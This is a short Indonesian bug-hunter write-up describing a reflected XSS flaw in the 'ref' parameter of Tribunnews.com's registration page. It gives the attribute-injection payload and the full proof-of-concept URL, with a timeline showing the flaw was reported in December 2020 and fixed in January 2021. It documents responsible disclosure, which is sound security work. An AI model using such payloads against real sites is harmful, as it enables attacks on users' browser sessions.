XSS REFLECTED Di Situs Tribunnews.com

Hi, Bug Hunter & Teman-teman Semua.

Di kesempatan kali ini saya bakal menuliskan tentang write up bug yang saya temukan di situs Tribunnews.com.

Baik langsung saya ke topik pembahasannya.

Vulnerability XSS REFLECTED terdapat di fitur Login. Berikut url nya :

https://www.tribunnews.com/auth/register?ref=

Disana memiliki kerentanan XSS REFLECTED, tepatnya di parameter ?ref=

Payload :

“onclick=”prompt(document.domain)

Final URL :

https://www.tribunnews.com/auth/register?ref=%22onclick=%22prompt(document.domain)

Pop up muncul..

Timeline :

Report : 28/12/2020

Fix : 05/01/2021

Pemburu Bug & Pengujian Penetrasi